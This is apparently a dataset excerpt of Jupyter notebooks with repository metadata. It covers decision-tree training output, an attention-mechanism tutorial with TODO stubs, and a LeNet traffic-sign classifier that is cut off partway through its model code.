Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 7\nCount of 2 = 2\nCurrent Gini Index is = 0.345679012345679\nSplitting on feature X[0] with gini gain 0.345679012345679\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 5\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 4\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 6\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 7\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 1\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 4\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 2\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 5\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 6\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 10\nCurrent Gini Index is = 0.1652892561983472\nSplitting on feature X[1] with gini gain 0.1652892561983472\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 4\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 3\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 4\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nPredictions : [2 2 1 1 2 1 1 1 1 2 2 0 0 1 1 1 2 0 2 0 1 1 0 1 1 1 0 0 2 2 0 0 2 1 1 0 0\n 2]\n\nScore : 1.0\n\nDOT DATA :- digraph Tree {\nnode [shape=box] ;\n0 [label=\"Feature to split upon : X[3]\\nOutput at this node : 0\" ];\n1 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 1 [ headlabel=\"Feature value = 0.2\"]; \n2 [label=\"Feature to split upon : X[0]\\nOutput at this node : 1\" ];\n0 -> 2 [ headlabel=\"Feature value = 1.7\"]; \n3 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 3 [ headlabel=\"Feature value = 2.4\"]; \n4 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 4 [ headlabel=\"Feature value = 1.3\"]; \n5 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 5 [ headlabel=\"Feature value = 1.6\"]; \n6 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 6 [ headlabel=\"Feature value = 0.5\"]; \n7 [label=\"Feature to split upon : X[0]\\nOutput at this node : 1\" ];\n0 -> 7 [ headlabel=\"Feature value = 1.5\"]; \n8 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 8 [ headlabel=\"Feature value = 2.0\"]; \n9 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 9 [ headlabel=\"Feature value = 1.4\"]; \n10 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 10 [ headlabel=\"Feature value = 2.2\"]; \n11 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 11 [ headlabel=\"Feature value = 1.0\"]; \n12 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 12 [ headlabel=\"Feature value = 2.3\"]; \n13 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 13 [ headlabel=\"Feature value = 2.5\"]; \n14 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 14 [ headlabel=\"Feature value = 0.6\"]; \n15 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 15 [ headlabel=\"Feature value = 1.1\"]; \n16 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 16 [ headlabel=\"Feature value = 2.1\"]; \n17 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n0 -> 17 [ headlabel=\"Feature value = 1.2\"]; \n18 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 18 [ headlabel=\"Feature value = 0.1\"]; \n19 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 19 [ headlabel=\"Feature value = 0.3\"]; \n20 [label=\"Feature to split upon : X[1]\\nOutput at this node : 2\" ];\n0 -> 20 [ headlabel=\"Feature value = 1.8\"]; \n21 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n0 -> 21 [ headlabel=\"Feature value = 1.9\"]; \n22 [label=\"Feature to split upon : X[None]\\nOutput at this node : 0\" ];\n0 -> 22 [ headlabel=\"Feature value = 0.4\"]; \n23 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n2 -> 23 [ headlabel=\"Feature value = 4.9\"]; \n24 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n2 -> 24 [ headlabel=\"Feature value = 6.7\"]; \n25 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 25 [ headlabel=\"Feature value = 5.6\"]; \n26 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 26 [ headlabel=\"Feature value = 5.4\"]; \n27 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 27 [ headlabel=\"Feature value = 5.9\"]; \n28 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 28 [ headlabel=\"Feature value = 6.4\"]; \n29 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 29 [ headlabel=\"Feature value = 6.9\"]; \n30 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 30 [ headlabel=\"Feature value = 6.7\"]; \n31 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n7 -> 31 [ headlabel=\"Feature value = 6.3\"]; \n32 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n7 -> 32 [ headlabel=\"Feature value = 6.5\"]; \n33 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n7 -> 33 [ headlabel=\"Feature value = 6.0\"]; \n34 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 34 [ headlabel=\"Feature value = 2.7\"]; \n35 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 35 [ headlabel=\"Feature value = 3.0\"]; \n36 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 36 [ headlabel=\"Feature value = 2.9\"]; \n37 [label=\"Feature to split upon : X[None]\\nOutput at this node : 1\" ];\n20 -> 37 [ headlabel=\"Feature value = 3.2\"]; \n38 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 38 [ headlabel=\"Feature value = 2.8\"]; \n39 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 39 [ headlabel=\"Feature value = 3.1\"]; \n40 [label=\"Feature to split upon : X[None]\\nOutput at this node : 2\" ];\n20 -> 40 [ headlabel=\"Feature value = 2.5\"]; \n}\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
e706dbda847d8ef2159713f49b2c40f68b78f1a1 | 9,198 | ipynb | Jupyter Notebook | attention/Attention_Basics.ipynb | prokokok/deep-learning-v2-pytorch | 5f04298aab7d51873b59e8720122def5673f1815 | [
"MIT"
] | null | null | null | attention/Attention_Basics.ipynb | prokokok/deep-learning-v2-pytorch | 5f04298aab7d51873b59e8720122def5673f1815 | [
"MIT"
] | null | null | null | attention/Attention_Basics.ipynb | prokokok/deep-learning-v2-pytorch | 5f04298aab7d51873b59e8720122def5673f1815 | [
"MIT"
] | null | null | null | 31.285714 | 335 | 0.624375 | [
[
[
"# Attention Basics\nIn this notebook, we look at how attention is implemented. We will focus on implementing attention in isolation from a larger model. That's because when implementing attention in a real-world model, a lot of the focus goes into piping the data and juggling the various vectors rather than the concepts of attention themselves.\n\nWe will implement attention scoring as well as calculating an attention context vector.\n\n## Attention Scoring\n### Inputs to the scoring function\nLet's start by looking at the inputs we'll give to the scoring function. We will assume we're in the first step in the decoding phase. The first input to the scoring function is the hidden state of decoder (assuming a toy RNN with three hidden nodes -- not usable in real life, but easier to illustrate):",
"_____no_output_____"
]
],
[
[
"dec_hidden_state = [5,1,20]",
"_____no_output_____"
]
],
[
[
"Let's visualize this vector:",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Let's visualize our decoder hidden state\nplt.figure(figsize=(1.5, 4.5))\nsns.heatmap(np.transpose(np.matrix(dec_hidden_state)), annot=True, cmap=sns.light_palette(\"purple\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"Our first scoring function will score a single annotation (encoder hidden state), which looks like this:",
"_____no_output_____"
]
],
[
[
"annotation = [3,12,45] #e.g. Encoder hidden state",
"_____no_output_____"
],
[
"# Let's visualize the single annotation\nplt.figure(figsize=(1.5, 4.5))\nsns.heatmap(np.transpose(np.matrix(annotation)), annot=True, cmap=sns.light_palette(\"orange\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"### IMPLEMENT: Scoring a Single Annotation\nLet's calculate the dot product of a single annotation. NumPy's [dot()](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) is a good candidate for this operation",
"_____no_output_____"
]
],
[
[
"def single_dot_attention_score(dec_hidden_state, enc_hidden_state):\n # TODO: return the dot product of the two vectors\n return \n \nsingle_dot_attention_score(dec_hidden_state, annotation)",
"_____no_output_____"
]
],
[
[
"\n### Annotations Matrix\nLet's now look at scoring all the annotations at once. To do that, here's our annotation matrix:",
"_____no_output_____"
]
],
[
[
"annotations = np.transpose([[3,12,45], [59,2,5], [1,43,5], [4,3,45.3]])",
"_____no_output_____"
]
],
[
[
"And it can be visualized like this (each column is a hidden state of an encoder time step):",
"_____no_output_____"
]
],
[
[
"# Let's visualize our annotation (each column is an annotation)\nax = sns.heatmap(annotations, annot=True, cmap=sns.light_palette(\"orange\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"### IMPLEMENT: Scoring All Annotations at Once\nLet's calculate the scores of all the annotations in one step using matrix multiplication. Let's continue to us the dot scoring method\n\n<img src=\"images/scoring_functions.png\" />\n\nTo do that, we'll have to transpose `dec_hidden_state` and [matrix multiply](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html) it with `annotations`.",
"_____no_output_____"
]
],
[
[
"def dot_attention_score(dec_hidden_state, annotations):\n # TODO: return the product of dec_hidden_state transpose and enc_hidden_states\n return \n \nattention_weights_raw = dot_attention_score(dec_hidden_state, annotations)\nattention_weights_raw",
"_____no_output_____"
]
],
[
[
"Looking at these scores, can you guess which of the four vectors will get the most attention from the decoder at this time step?\n\n## Softmax\nNow that we have our scores, let's apply softmax:\n<img src=\"images/softmax.png\" />",
"_____no_output_____"
]
],
[
[
"def softmax(x):\n x = np.array(x, dtype=np.float128)\n e_x = np.exp(x)\n return e_x / e_x.sum(axis=0) \n\nattention_weights = softmax(attention_weights_raw)\nattention_weights",
"_____no_output_____"
]
],
[
[
"Even when knowing which annotation will get the most focus, it's interesting to see how drastic softmax makes the end score become. The first and last annotation had the respective scores of 927 and 929. But after softmax, the attention they'll get is 0.12 and 0.88 respectively.\n\n# Applying the scores back on the annotations\nNow that we have our scores, let's multiply each annotation by its score to proceed closer to the attention context vector. This is the multiplication part of this formula (we'll tackle the summation part in the latter cells)\n\n<img src=\"images/Context_vector.png\" />",
"_____no_output_____"
]
],
[
[
"def apply_attention_scores(attention_weights, annotations):\n # TODO: Multiple the annotations by their weights\n return\n\napplied_attention = apply_attention_scores(attention_weights, annotations)\napplied_attention",
"_____no_output_____"
]
],
[
[
"Let's visualize how the context vector looks now that we've applied the attention scores back on it:",
"_____no_output_____"
]
],
[
[
"# Let's visualize our annotations after applying attention to them\nax = sns.heatmap(applied_attention, annot=True, cmap=sns.light_palette(\"orange\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"Contrast this with the raw annotations visualized earlier in the notebook, and we can see that the second and third annotations (columns) have been nearly wiped out. The first annotation maintains some of its value, and the fourth annotation is the most pronounced.\n\n# Calculating the Attention Context Vector\nAll that remains to produce our attention context vector now is to sum up the four columns to produce a single attention context vector\n",
"_____no_output_____"
]
],
[
[
"def calculate_attention_vector(applied_attention):\n return np.sum(applied_attention, axis=1)\n\nattention_vector = calculate_attention_vector(applied_attention)\nattention_vector",
"_____no_output_____"
],
[
"# Let's visualize the attention context vector\nplt.figure(figsize=(1.5, 4.5))\nsns.heatmap(np.transpose(np.matrix(attention_vector)), annot=True, cmap=sns.light_palette(\"Blue\", as_cmap=True), linewidths=1)",
"_____no_output_____"
]
],
[
[
"Now that we have the context vector, we can concatenate it with the hidden state and pass it through a hidden layer to produce the the result of this decoding time step.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e706dc46496918b6c87c5b5bab2f226e953e6b7c | 528,336 | ipynb | Jupyter Notebook | Traffic_Sign_Classifier.ipynb | Sitesh-Kumar-Singh/TrafficSignClassifier | 5913a9434bb4cab20dae3114c827ea6f0e36a4d7 | [
"MIT"
] | null | null | null | Traffic_Sign_Classifier.ipynb | Sitesh-Kumar-Singh/TrafficSignClassifier | 5913a9434bb4cab20dae3114c827ea6f0e36a4d7 | [
"MIT"
] | null | null | null | Traffic_Sign_Classifier.ipynb | Sitesh-Kumar-Singh/TrafficSignClassifier | 5913a9434bb4cab20dae3114c827ea6f0e36a4d7 | [
"MIT"
] | null | null | null | 475.122302 | 135,436 | 0.934636 | [
[
[
"# Self-Driving Car Engineer Nanodegree\n\n## Deep Learning\n\n## Project: Build a Traffic Sign Recognition Classifier\n\nIn this notebook, a template is provided for you to implement your functionality in stages, which is required to successfully complete this project. If additional code is required that cannot be included in the notebook, be sure that the Python code is successfully imported and included in your submission if necessary. \n\n> **Note**: Once you have completed all of the code implementations, you need to finalize your work by exporting the iPython Notebook as an HTML document. Before exporting the notebook to html, all of the code cells need to have been run so that reviewers can see the final implementation and output. You can then export the notebook by using the menu above and navigating to \\n\",\n \"**File -> Download as -> HTML (.html)**. Include the finished document along with this notebook as your submission. \n\nIn addition to implementing code, there is a writeup to complete. The writeup should be completed in a separate file, which can be either a markdown file or a pdf document. There is a [write up template](https://github.com/udacity/CarND-Traffic-Sign-Classifier-Project/blob/master/writeup_template.md) that can be used to guide the writing process. Completing the code template and writeup template will cover all of the [rubric points](https://review.udacity.com/#!/rubrics/481/view) for this project.\n\nThe [rubric](https://review.udacity.com/#!/rubrics/481/view) contains \"Stand Out Suggestions\" for enhancing the project beyond the minimum requirements. The stand out suggestions are optional. If you decide to pursue the \"stand out suggestions\", you can include the code in this Ipython notebook and also discuss the results in the writeup file.\n\n\n>**Note:** Code and Markdown cells can be executed using the **Shift + Enter** keyboard shortcut. In addition, Markdown cells can be edited by typically double-clicking the cell to enter edit mode.",
"_____no_output_____"
],
[
"---\n## Step 0: Load The Data",
"_____no_output_____"
]
],
[
[
"# Load pickled data\nimport pickle\n\n# TODO: Fill this in based on where you saved the training and testing data\n\ntraining_file = '/home/workspace/data/train.p'\nvalidation_file='/home/workspace/data/valid.p'\ntesting_file = '/home/workspace/data/test.p'\n\nwith open(training_file, mode='rb') as f:\n train = pickle.load(f)\nwith open(validation_file, mode='rb') as f:\n valid = pickle.load(f)\nwith open(testing_file, mode='rb') as f:\n test = pickle.load(f)\n \nX_train, y_train = train['features'], train['labels']\nX_valid, y_valid = valid['features'], valid['labels']\nX_test, y_test = test['features'], test['labels']",
"_____no_output_____"
]
],
[
[
"---\n\n## Step 1: Dataset Summary & Exploration\n\nThe pickled data is a dictionary with 4 key/value pairs:\n\n- `'features'` is a 4D array containing raw pixel data of the traffic sign images, (num examples, width, height, channels).\n- `'labels'` is a 1D array containing the label/class id of the traffic sign. The file `signnames.csv` contains id -> name mappings for each id.\n- `'sizes'` is a list containing tuples, (width, height) representing the original width and height the image.\n- `'coords'` is a list containing tuples, (x1, y1, x2, y2) representing coordinates of a bounding box around the sign in the image. **THESE COORDINATES ASSUME THE ORIGINAL IMAGE. THE PICKLED DATA CONTAINS RESIZED VERSIONS (32 by 32) OF THESE IMAGES**\n\nComplete the basic data summary below. Use python, numpy and/or pandas methods to calculate the data summary rather than hard coding the results. For example, the [pandas shape method](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.shape.html) might be useful for calculating some of the summary results. ",
"_____no_output_____"
],
[
"### Provide a Basic Summary of the Data Set Using Python, Numpy and/or Pandas",
"_____no_output_____"
]
],
[
[
"### Replace each question mark with the appropriate value. \n### Use python, pandas or numpy methods rather than hard coding the results\nimport numpy as np\n# TODO: Number of training examples\nn_train = X_train.shape[0]\n\n# TODO: Number of validation examples\nn_validation = X_valid.shape[0]\n\n# TODO: Number of testing examples.\nn_test = X_test.shape[0]\n\n# TODO: What's the shape of an traffic sign image?\nimage_shape = X_train.shape[1:]\n\n# TODO: How many unique classes/labels there are in the dataset.\nn_classes = len(np.unique(y_train))\n\nprint(\"Number of training examples =\", n_train)\nprint(\"Number of testing examples =\", n_test)\nprint(\"Number of validation examples =\", n_validation)\nprint(\"Image data shape =\", image_shape)\nprint(\"Number of classes =\", n_classes)",
"Number of training examples = 34799\nNumber of testing examples = 12630\nNumber of validation examples = 4410\nImage data shape = (32, 32, 3)\nNumber of classes = 43\n"
]
],
[
[
"### Include an exploratory visualization of the dataset",
"_____no_output_____"
],
[
"Visualize the German Traffic Signs Dataset using the pickled file(s). This is open ended, suggestions include: plotting traffic sign images, plotting the count of each sign, etc. \n\nThe [Matplotlib](http://matplotlib.org/) [examples](http://matplotlib.org/examples/index.html) and [gallery](http://matplotlib.org/gallery.html) pages are a great resource for doing visualizations in Python.\n\n**NOTE:** It's recommended you start with something simple first. If you wish to do more, come back to it after you've completed the rest of the sections. It can be interesting to look at the distribution of classes in the training, validation and test set. Is the distribution the same? Are there more examples of some classes than others?",
"_____no_output_____"
]
],
[
[
"### Data exploration visualization code goes here.\n### Feel free to use as many code cells as needed.\nimport matplotlib.pyplot as plt\n# Visualizations will be shown in the notebook.\n%matplotlib inline\n",
"_____no_output_____"
],
[
"#Bar Graph\nimport pandas as pd\nimport seaborn as sns\nfrom collections import Counter\nsignnames = pd.read_csv('signnames.csv')\nsignnames.set_index('ClassId',inplace=True)\ndef get_name_from_label(label):\n # Helper, transofrm a numeric label into the corresponding strring\n return signnames.loc[label].SignName\n",
"_____no_output_____"
],
[
"counter = Counter(y_train)\ncounts = pd.DataFrame(columns=['sign_label','training_samples_count'],data=[(label, count) for label, count in counter.items()])\ncounts['sign'] = counts.sign_label.apply(get_name_from_label)\nplt.figure(figsize=(12,12))\nsns.set(font_scale=1.3)\nsns.barplot(x='training_samples_count',y='sign',data=counts,orient='h')\nplt.xticks(rotation=90)\nplt.ylabel('Sign Name')\nplt.xlabel('Number of samples on each category');\nplt.tight_layout()\nplt.savefig('write_up_data/train_number_of_samples_on_each_category.png')",
"_____no_output_____"
],
[
"counter = Counter(y_valid)\ncounts = pd.DataFrame(columns=['sign_label','training_samples_count'],data=[(label, count) for label, count in counter.items()])\ncounts['sign'] = counts.sign_label.apply(get_name_from_label)\nplt.figure(figsize=(12,12))\nsns.set(font_scale=1.3)\nsns.barplot(x='training_samples_count',y='sign',data=counts,orient='h')\nplt.xticks(rotation=90)\nplt.ylabel('Sign Name')\nplt.xlabel('Number of samples on each category');\nplt.tight_layout()\nplt.savefig('write_up_data/validate_number_of_samples_on_each_category.png')",
"_____no_output_____"
],
[
"counter = Counter(y_test)\ncounts = pd.DataFrame(columns=['sign_label','training_samples_count'],data=[(label, count) for label, count in counter.items()])\ncounts['sign'] = counts.sign_label.apply(get_name_from_label)\nplt.figure(figsize=(12,12))\nsns.set(font_scale=1.3)\nsns.barplot(x='training_samples_count',y='sign',data=counts,orient='h')\nplt.xticks(rotation=90)\nplt.ylabel('Sign Name')\nplt.xlabel('Number of samples on each category');\nplt.tight_layout()\nplt.savefig('write_up_data/test_number_of_samples_on_each_category.png')",
"_____no_output_____"
]
],
[
[
"----\n\n## Step 2: Design and Test a Model Architecture\n\nDesign and implement a deep learning model that learns to recognize traffic signs. Train and test your model on the [German Traffic Sign Dataset](http://benchmark.ini.rub.de/?section=gtsrb&subsection=dataset).\n\nThe LeNet-5 implementation shown in the [classroom](https://classroom.udacity.com/nanodegrees/nd013/parts/fbf77062-5703-404e-b60c-95b78b2f3f9e/modules/6df7ae49-c61c-4bb2-a23e-6527e69209ec/lessons/601ae704-1035-4287-8b11-e2c2716217ad/concepts/d4aca031-508f-4e0b-b493-e7b706120f81) at the end of the CNN lesson is a solid starting point. You'll have to change the number of classes and possibly the preprocessing, but aside from that it's plug and play! \n\nWith the LeNet-5 solution from the lecture, you should expect a validation set accuracy of about 0.89. To meet specifications, the validation set accuracy will need to be at least 0.93. It is possible to get an even higher accuracy, but 0.93 is the minimum for a successful project submission. \n\nThere are various aspects to consider when thinking about this problem:\n\n- Neural network architecture (is the network over or underfitting?)\n- Play around preprocessing techniques (normalization, rgb to grayscale, etc)\n- Number of examples per label (some have more than others).\n- Generate fake data.\n\nHere is an example of a [published baseline model on this problem](http://yann.lecun.com/exdb/publis/pdf/sermanet-ijcnn-11.pdf). It's not required to be familiar with the approach used in the paper but, it's good practice to try to read papers like these.",
"_____no_output_____"
],
[
"### Pre-process the Data Set (normalization, grayscale, etc.)",
"_____no_output_____"
],
[
"Minimally, the image data should be normalized so that the data has mean zero and equal variance. For image data, `(pixel - 128)/ 128` is a quick way to approximately normalize the data and can be used in this project. \n\nOther pre-processing steps are optional. You can try different techniques to see if it improves performance. \n\nUse the code cell (or multiple code cells, if necessary) to implement the first step of your project.",
"_____no_output_____"
]
],
[
[
"'''\nimport cv2\ndef rotateImageRandomly(img):\n c_x,c_y = int(img.shape[0]/2), int(img.shape[1]/2)\n ang = 30.0*np.random.rand()-15\n Mat = cv2.getRotationMatrix2D((c_x, c_y), ang, 1.0)\n return cv2.warpAffine(img, Mat, img.shape[:2])\n\ndef linearImageTransformation(img,s=1.0,m=0.0):\n img2=cv2.multiply(img, np.array([s]))\n return cv2.add(img2, np.array([m]))\n\ndef changeImageContrast(img, s=1.0):\n m=127.0*(1.0-s)\n return linearImageTransformation(img, s, m)\n\ndef makeAugmentation(img):\n img = img.copy()\n img = changeImageContrast(img, 1.8*np.random.rand()+0.2)\n img = rotateImageRandomly(img)\n\n return img\n\nX_train_transformed = list()\ny_train_transformed = list()\nfor i in range(X_train.shape[0]):\n img = X_train[i]\n label = y_train[i]\n for j in range(100):\n imgout = makeAugmentation(img)\n X_train_transformed.append(imgout)\n y_train_transformed.append(label)\nX_train_transformed = np.concatenate(X_train_transformed,axis=0)\ny_train_transformed = np.array(y_train_transformed)\n'''",
"_____no_output_____"
],
[
"### Preprocess the data here. It is required to normalize the data. Other preprocessing steps could include \n### converting to grayscale, etc.\n### Feel free to use as many code cells as needed.\n\nX_train = np.sum(X_train/3, axis=3, keepdims=True)\n\nX_test = np.sum(X_test/3, axis=3, keepdims=True)\n\nX_valid = np.sum(X_valid/3, axis=3, keepdims=True)\n\nX_train = (X_train-128)/128\nX_test = (X_test-128)/128\nX_valid = (X_valid-128)/128",
"_____no_output_____"
]
],
[
[
"### Model Architecture",
"_____no_output_____"
]
],
[
[
"### Define your architecture here.\n### Feel free to use as many code cells as needed.\nfrom sklearn.utils import shuffle\nimport tensorflow as tf\nEPOCHS = 40\nBATCH_SIZE = 128\n",
"_____no_output_____"
],
[
"from tensorflow.contrib.layers import flatten\ndef LeNet(x): \n # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer\n mu = 0\n sigma = 0.1\n\n # SOLUTION: Layer 1: Convolutional. Input = 32x32x1. Output = 28x28x6.\n conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 1, 6), mean = mu, stddev = sigma))\n conv1_b = tf.Variable(tf.zeros(6))\n conv1 = tf.nn.conv2d(x, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b\n\n # SOLUTION: Activation.\n conv1 = tf.nn.relu(conv1)\n\n # SOLUTION: Pooling. Input = 28x28x6. Output = 14x14x6.\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # SOLUTION: Layer 2: Convolutional. Output = 10x10x16.\n conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean = mu, stddev = sigma))\n conv2_b = tf.Variable(tf.zeros(16))\n conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b\n\n # SOLUTION: Activation.\n conv2 = tf.nn.relu(conv2)\n\n # SOLUTION: Pooling. Input = 10x10x16. Output = 5x5x16.\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n \n #1x1 convolution\n \n\n # SOLUTION: Flatten. Input = 5x5x16. Output = 400.\n fc0 = flatten(conv2)\n \n \n \n\n # SOLUTION: Layer 3: Fully Connected. Input = 400. Output = 120.\n fc1_W = tf.Variable(tf.truncated_normal(shape=(400,120), mean = mu, stddev = sigma))\n fc1_b = tf.Variable(tf.zeros(120))\n fc1 = tf.matmul(fc0, fc1_W) + fc1_b\n\n # SOLUTION: Activation.\n fc1 = tf.nn.relu(fc1)\n\n # SOLUTION: Layer 4: Fully Connected. Input = 120. Output = 84.\n fc2_W = tf.Variable(tf.truncated_normal(shape=(120, 84), mean = mu, stddev = sigma))\n fc2_b = tf.Variable(tf.zeros(84))\n fc2 = tf.matmul(fc1, fc2_W) + fc2_b\n\n # SOLUTION: Activation.\n fc2 = tf.nn.relu(fc2)\n\n # SOLUTION: Layer 5: Fully Connected. Input = 84. Output = 10.\n fc3_W = tf.Variable(tf.truncated_normal(shape=(84, 43), mean = mu, stddev = sigma))\n 